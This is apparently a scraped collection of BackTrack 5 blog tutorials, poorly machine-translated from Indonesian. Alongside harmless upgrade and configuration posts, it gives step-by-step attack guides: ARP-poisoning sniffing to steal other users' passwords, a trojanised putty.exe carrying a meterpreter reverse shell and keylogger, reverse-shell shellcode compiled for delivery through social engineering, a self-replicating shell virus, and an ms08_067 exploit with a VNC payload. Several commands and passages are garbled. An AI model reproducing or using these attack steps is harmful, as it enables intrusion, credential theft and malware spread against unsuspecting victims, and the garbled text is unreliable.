Solution msfconsole & msfupdate are not running after updating to 4.5.0 metasploit bt0

BackTrack 5 R3 For users who experience problems msfconsole and msfupdate not run properly after doing apt-get update and apt-get upgrade, the following explanation of the causes and solutions can be used.

One cause of the above problems is a directory "msf3" does not exist in the directory / opt / metasploit. Some use the solution by doing copy paste of BackTrack msf3 directory that has not been updated / upgraded to the BackTrack used. But in my opinion, the way they allow us to use the same version metasploit metasploit on BackTrack with that has not been updated / upgraded. So the solution that I currently use and up to date is to use the command "git clone".

Here are the steps:

1. cd /opt/metasploit
2. git clone https://github.com/rapid7/metasploit-framework.git msf3

Once completed, please restart msfconsole:




Hopefully useful.

How To Upgrade to BackTrack 5 R3

Size of Backtrack 5 R3 is growing compared to the previous version would make anyone BackTrack users started having fears about the very deep (Animashaun) to download the file ISOBacktrack 5 R3. But it all paid off with a number of changes that can be found in this latest version, from the addition of new applications to the Bug-patch bugs in the previous version, the developer proves serious work on these distributions.      

And for a friend whose fate is to live with high-speed eleven twelve with snails (only about 20 kbps), it would appear the problem (personal pengalamana) when downloading Backtrack 5 R3, among others:

1. Hunger for food rations reduced from 3 times a day so 1 a day (the expensive internet quota).
2. Sick from lack of sleep (4 days 3 nights not sleep waiting downloading).
3. Ngak can sms / call boyfriend (already purchased quota abis all).
4. Lots of daydreaming (If later is finished downloading it ...).
5. Always Galau (Corrput ngak yes file).
6. and much more.


Therefore here I will provide a solution to solve the problems to be faced, there are two solutions that can be provided include:

1. Buying DVD BackTrack 5 R3 at a cheap price here.
2. Upgrade, it also requires a quota upgrade but not as big as if a friend had to download and menggalami problem as above.

Tutorial Upgrade to BackTrack 5 R3

Step by Step :

Pay attention and follow each step below.

1. Make sure that the system we are using now is up2date, to check whether the system we are able to use the up2date command:

root@bt:~# apt-get update

2. Once we make sure our system is up2date, now is the upgrade by using the command:

root@bt:~# apt-get dist-upgrade

3. After the upgrade is completed, the information above to mengginstall ketahap latest applications on Backtrack 5 R3. In BackTrack 5 R3 there are some differences between the tool 32 bit and 64 bit, so make sure to use version of BackTrack a friend.

BackTrack 32 bit

root@bt:~# apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

BackTrack 64 bit

root@bt:~# libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

4. Wait until all applications are installed properly, and if it is finished restart. I hope this tutorial is useful for companions.

How To Sniffing with ettercap

Ettercap is a good sniffer program for seniffing activities, because it captures the data on the network is known lokal.Ettercap able to capture all network traffic and we can capture passwords entered by other users of our network. Analyzing the data we capture conversations messaging clients like MSN or other instant messaging client, we could use a man-in-the-Midler "MITM (Man The Midle), and so on.

The first step and install a sniffer (ettercap).
And the latest version 0.7.3 and is available for Linux and Windows OS.

Versi Windows
Versi Linux

For distro based on debian / ubuntu simply type :

# sudo apt-get install ettercap-gtk

For other distributions, we need to download to compile the package.


#. / Configure
# make
# make install


How to ?

First open Ettercap and run in root mode.

Sniffer > Unified Sniffing

Select the network card you want to select and then click "OK".

Hosts > Scan for Hosts
At the bottom of the screen as "Hosts List is a host that added" (Those listed below are computers that are online in the network).

Hosts > Host list

Now appear the IP of the computer that is connected, it must be remembered that the router is also emerging.

Select IP to attack your computer and click "Add to Target 1", then the router on the "Add to Target 2"

Before you start doing sniffer, let us remember and use a technique called man-in-the-Midler.

MITM > ARP Poisoning - Sekarang check list pada "Sniff remote connections" dan klik "OK"

Start > Start sniffing.

we have done sniffing.

View> Connections - Here we can see all the connections, double click to see the data they contain, including conversations, users and passwords, etc..

Sekarang tinggalkan biarkan Ettercap bekerja.3;)

how to exploit windows 7 and windows XP using backtrack 5

Please read this article about how to exploit Windows 7 and how to exploit Windows XP. Here

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

If you think Windows 7 can not diexploit, you are wrong because there are many ways in which to be able to do exploits for an Operating System, now we will do srcexploits for Windows XP and 7, plus more ways to record the keyboard keystrokes (keylogger ) through meterpreter.Check it Out.

1. Find the file you will use to lure the target execute file. Here I use putty.exe file, so download first.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

2. Infections file to be executed by the payload exploit.rubah putty.exe name manjadi putty_pro.exe and use exploits x86/shikata_ga_nai, create a master already knows.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5

3. Run Metasploit and create a listener so that when the file we created above will automatically open meterpreter executable.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit

4. I do not know how to copy files that have been infected above into the victim's computer, somehow [the effort necessary bro]. When the executable file will then automatically meterpreter terbuka.sekarang up to you what to do with the computer.

note : our computer to the target will be lost when the file is executed connection closed [tested so we know].


5. Plus here is merecord all typed from the keyboard. Use the command keyscan_start and to see the results of the victim's keystrokes using keyscan_dump. Pawned!

Windows XP :

Windows 7 :

Hopefully this tutorial can help friends who are having trouble finding tutorialsl.

how to fix the sound problem in backtrack 5

If you use the Backtrack 5 R1 or else may have already discovered that the sound function is not working properly, so let's finish here.

1. go to the System > Preferences > Startup Application

2. Then click Add and enter the following configuration.

Name : Pulseaudio daemon
Command :/usr/bin/pulseaudio
Comment : Start the sound daemon

Logout and login again, please enjoy the music.

How To Exploit Linux using Backtrack 5

This time we will do exploit the linux operating system, my friend may feel that linux is the most secure operating system is universal, but I said no, because there is no system in the world's safest, most ngak if the system is impenetrable ngak just use social engginer , ato administrator wrote kidnapped, then we ask hehehe .. The following example exploitasinya.

1. Get exploit code.

root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
 * linux/x86/shell_reverse_tcp - 71 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.43.66, LPORT=5050,
 * ReverseConnectRetries=5, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework#

2. Create a file exploit.

Open gedit then copy the result of the exploit code that we get.

edit to be like this fits under.

unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) buf;
(int)(*funct)();
}

save it exploitbacktrack.c

3. Compile file exploit.

root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~#

4. Use Social engginer exploit file that floated to the target computer.

5. Open a new terminal and create a listener to wait for our exploit file dieksekusi.

root@bt:~# nc -lvp 5050

6. AndTarrrrraaaaaaaaaaaaaaaaaaaaaaa !!

Basic Commands in Back | Track 5

On the basis of the commands or syntax-BackTrack linux operating,
yes already ga have many cing-cong directly to the scene

 [*] Login
Username root password toor > default user to backtrack, ane suggestions after login immediately replace the password with the command
root@bt:~# passwd
then enter the new password

[*] Memperbaiki tampilan splash:
root@bt:~# fix-splash

[*] Memulai X-server (Desktop GUI)
root@bt:~# startx

[*] networking
to start networking usually use wicd but previously used in the console type:
root@bt:~# /etc/init.d/wicd start
then click:
menu > internet > wicd netwok manager

setting ip dynamic,
root@bt:~# dhclient <interface network ente>
-- interface here could be eth0 or eth1

Setting IP static
for example:
interface - eth0
IP Address - 192.168.1.9/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
the commands used are:

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

This will return the default settings when on reboot, to make this permanent, then we need to edit the file /etc/network/interfaces,

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

then save by using the CTRL + X then answer y then enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

[*] Memulai service di BT :

    SSH (Secure Shell)
    before running the ssh service for the first time, we need to generate his keys run the command:
    root@bt:~# sshd-generate
    root@bt:~# /etc/init.d/ssh start
    Starting OpenBSD Secure Shell server: sshd.

    to stop the service:
    root@bt:~# /etc/init.d/ssh stop
    Stopping OpenBSD Secure Shell server: sshd.
    apache webserver
    root@bt:~# /etc/init.d/apache2 start
    or it could be with the command

    root@bt:~# service apache2 start
    * Starting web server apache2

    or :
    root@bt:~# apache2ctl start

    to stop the service:

    root@bt:~# /etc/init.d/apache2 stop

    or :
    root@bt:~# service apache2 stop

    or :
    root@bt:~# apache2ctl stop
    MySQL
    to start can use the command:
    root@bt:~# /etc/init.d/mysql start

   or :
    root@bt:~# start mysql

    to stop:
    root@bt:~# /etc/init.d/mysql stop

    atau :
    root@bt:~# stop mysql


commands / syntax above is only a small part of the overall syntax to operate a Linux-BT,, well if anyone would nambahin or correcting syntax above, I gladly accept it gracefully.

About UNIX SHELL Virus in backtrack

UNIX SHELL Virus
This program is of little practical significance, but it is helpful to understand the mechanism of visual spread of the virus. Therefore, it is instructive significance is more important than the practical.

following the program


Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
# note: the virus will affect all the files ending with *. sh in the current
directory, but it will not affect them repeatedly.
#compiler: watercloud@xfocus.org
#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF

Keep the format Unixvirus.sh

Her statement:
# B: <+% C & t:!>
Virus from the body tag, so the program can find themselves during copying.

vFile = $ _;. vTmp = / tmp / .vTmp $ $
Defining two variables. One is a temporary file, file-note when ininama $ _. Therefore we need this line should be the first line in the line of effective programs, otherwise it is not possible to get the name of the current program, and then it is impossible to find the body of the virus to copy.

untuk f di / *. sh;.do
Begin the circle, and know all the programs that end with sh di.saat directory.

if [! -W $ f-a! -R $ vFile], then continue; fi
If the target has been writing privileges and if the virus source file has read privileges.

if grep '<+% C & t:!>' $ f, then continue; fi
If the target has been irreversibly affected. If so it would be immoral to influence another.

jika sed-n '1 p '$ f | grep' csh ', then continue; fi
If the target in the csh shell, they are too different in grammar.

cp-f $ f $ vTmp, jika [$? -Ne 0], then continue; fi
Get ready for influence. First copy the backup to the target. What if copying fails? Of course, had no choice but to surrender.

VNO=`awk '$ 0 ~ / (^ \ *#)|(^ b \ b *$)/&& v == NR-1 {v} + + END {print 0 + v}' $ vTmp`
to determine the initial and formal expression. This is one used to find how much. comment lines and blank lines at the beginning of the program, so as to determine the position of the body to inject the virus.

sed-n "1, $ {} VNO p" $ vTmp> $ f
Sed the start command to copy the comments of the target file back from the backup file.

(Sed-n '/ ^ # B: <+ a% K & t :>/,/^# E: <+ a% K & t:!> / P' $ vFile; echo)>> $ f
One more sed to solve transportation virus body.

VNO = `expr $ VNO + 1`sed-n "$ {VNO}, \ $ p" $ vTmp>> $ f
The last sed moving other parts of the target file again. sed strong!

rm-f $ vTmp
Clean up temporary files.do> / dev / null 2> & 1
Circle ends.unset vTmp; unset vFile; unset VNO

Clean scene.echo "Demo shell virus script !"
Since the file has been affected, showing some indication to say this is an affected one.

# EOF:
Stop the virus body marking, so the program puts its own copy.

How To Remote Desktop use Exploit in backtrack 5

RDP or better known as Remote Desktop commonly used in windows OS, so that the computer can be accessed remotely melaluui Internet network
.
But this time I will OFTEN how to RDP without touching the computer that will be remote. In this case use the exploit on BackTrack 5,, okay without a lot of talking directly to the scene

1. Turn your BackTrack 5
2. Open Terminal
3. directly into the Metasploit with the syntax:
     root@bt:~# msfconsole
4. wait until the Metasploit open
5. open directly after just typing
   msf > use exploit/windows/smb/ms08_067_netapi ( enter )
6. then it will go to the dir
   msf> exploit (ms08_067_netapi )

7. and typing
    msf> exploit (ms08_067_netapi ) set PAYLOAD windows/vncinject/bind_tcp ( enter )
    msf> exploit (ms08_067_netapi ) set RHOST 192.168.0.1 ==> itu IP target
    msf> exploit (ms08_067_netapi ) exploit 

8. How successful it will exit the victim's computer desktop, if you've never so whatever you want in how that company..